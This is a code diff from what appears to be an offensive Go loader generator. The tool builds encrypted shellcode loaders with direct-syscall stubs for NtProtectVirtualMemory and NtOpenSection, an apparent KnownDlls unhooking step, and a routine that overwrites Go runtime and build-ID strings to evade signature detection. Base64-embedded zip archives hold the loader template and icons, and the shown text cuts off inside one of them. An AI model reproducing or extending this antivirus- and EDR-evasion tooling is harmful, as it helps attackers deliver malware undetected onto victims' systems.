`"bytes"`) + PackageEditor("loader/loader.go", "[log_import]", `"log"`) + PackageEditor("loader/loader.go", "[ELZMA]", `"github.com/ulikunitz/xz"`) + PackageEditor("loader/loader.go", "[cipher_import]", ``) + PackageEditor("loader/loader.go", "[aes_import]", ``) + } + if encryptionmode == "AES" { + PackageEditor("loader/loader.go", "[cipher_import]", `"crypto/cipher"`) + PackageEditor("loader/loader.go", "[aes_import]", `"crypto/aes"`) + PackageEditor("loader/loader.go", "[io_import]", ``) + PackageEditor("loader/loader.go", "[bytes_import]", ``) + PackageEditor("loader/loader.go", "[log_import]", ``) + PackageEditor("loader/loader.go", "[ELZMA]", ``) + } + if encryptionmode == "RC4" { + PackageEditor("loader/loader.go", "[cipher_import]", `"crypto/rc4"`) + PackageEditor("loader/loader.go", "[aes_import]", ``) + PackageEditor("loader/loader.go", "[io_import]", ``) + PackageEditor("loader/loader.go", "[bytes_import]", ``) + PackageEditor("loader/loader.go", "[log_import]", ``) + PackageEditor("loader/loader.go", "[ELZMA]", ``) + } + PackageEditor("loader/loader.go", "[NtProtectVirtualMemoryprep]", NTVirProtpre) - PackageEditor(name, "[NtProtectVirtualMemoryprep]", NTVirProtpre) + PackageEditor("loader/loader.go", "[NtProtectVirtualMemoryJMPprep]", NtProtectVirtualMemoryJMPprep) PackageEditor("loader/loader.go", "NtProtectVirtualMemory", NTVirProt) PackageEditor("loader/loader.go", "Allocate", Alloc) + PackageEditor("loader/loader.go", "[NtOpenSectionprep]", NtOpenSectionprep) + PackageEditor("loader/loader.go", "NtOpenSection", NtOpenSection) + PackageEditor("loader/loader.go", "loader", loader) PackageEditor("loader/loader.go", "FuncName", FuncName) @@ -56,12 +93,22 @@ func ModuleObfuscator(name string, FuncName string) { PackageEditor("loader/loader.go", "[regionSize]", regionSize) PackageEditor("loader/loader.go", "[NewProtect]", NewProtect) PackageEditor("loader/loader.go", "[oldprotect]", oldprotect) + PackageEditor("loader/loader.go", "[syscallA]", syscallA) + PackageEditor("loader/loader.go", "[KnownDll]", KnownDll) + PackageEditor("loader/loader.go", "[ttttt]", ttttt) + PackageEditor("loader/loader.go", "[objectAttributes]", objectAttributes) PackageEditor("loader/asm.s", "NtProtectVirtualMemory", NTVirProt) PackageEditor("loader/asm.s", "Allocate", Alloc) + PackageEditor("loader/asm.s", "NtOpenSection", NtOpenSection) PackageEditor(name, "[loader]", loader) PackageEditor(name, "[NtProtectVirtualMemory]", NTVirProt) PackageEditor(name, "[Allocate]", Alloc) + PackageEditor(name, "[NtProtectVirtualMemoryJMPprep]", NtProtectVirtualMemoryJMPprep) + PackageEditor(name, "[NtProtectVirtualMemoryprep]", NTVirProtpre) + PackageEditor(name, "[NtOpenSection]", NtOpenSection) + PackageEditor(name, "[NtOpenSectionprep]", NtOpenSectionprep) + PackageEditor("go.mod", "loader", loader) os.Rename("loader/loader.go", "loader/"+loader+".go") os.Rename("loader", loader) @@ -104,6 +151,36 @@ func CheckGarble() { } } +func GoEditor(name string) { + buff, err := ioutil.ReadFile(name) + if err != nil { + log.Fatalf("Error: %s", err) + } + gostringg1 := "to unallocated span37252902984619140625Arabic Standard TimeAzores Standard" + gostringg2 := "TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWEgyptian_HieroglyphsEtwReplyNotificationGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorIsrael Standard TimeJordan Standard TimeMeroitic_Hieroglyphs" + gostringg3 := "Standard Timebad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection timed outdodeltimer0: wrong Pfloating point errorforcegc: phase errorgo of nil func valuegopark: bad g statusinconsistent lockedminvalid request" + gostringg4 := "codeinvalid write resultis a named type filekey has been revokedmalloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.Value.SetIntreflect.makeFuncStubruntime: double waitruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header of unexported method previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Standard TimeChangeServiceConfig2WDeregisterEventSourceEastern Standard" + gostringg5 := "0123456789abcdefghijklmnopqrstuvwxyz444089209850062616169452667236328125Go pointer stored into non-Go memory" + gostringg6 := "buildinf:" + gostringg7 := " Go build ID:" + gostringg8 := "gogo" + gostringg9 := "goid" + gostringg10 := "go.buildid" + gostringg11 := "_cgo_dummy_export" + gostringg12 := "glob" + gostringg13 := "fatal error: cgo callback before cgo cal" + stringnum := []string{gostringg1, gostringg2, gostringg3, gostringg4, gostringg5, gostringg6, gostringg7, gostringg8, gostringg9, gostringg10, gostringg11, gostringg12, gostringg13} + + mydata := string(buff) + for i := range stringnum { + val := Cryptor.RandStringBytes(len(stringnum[i])) + mydata = strings.ReplaceAll(string(mydata), stringnum[i], val) + } + + ioutil.WriteFile(name, []byte(mydata), 0777) + +} + func Sha256(input string) { f, err := os.Open(input) if err != nil { @@ -223,8 +300,7 @@ func Unzip(src string, dest string) ([]string, error) { func B64decode(name string) { var base64string string if name == "loader.zip" { - base64string = "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" - + base64string = "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" } if name == "icons.zip" { base64string = "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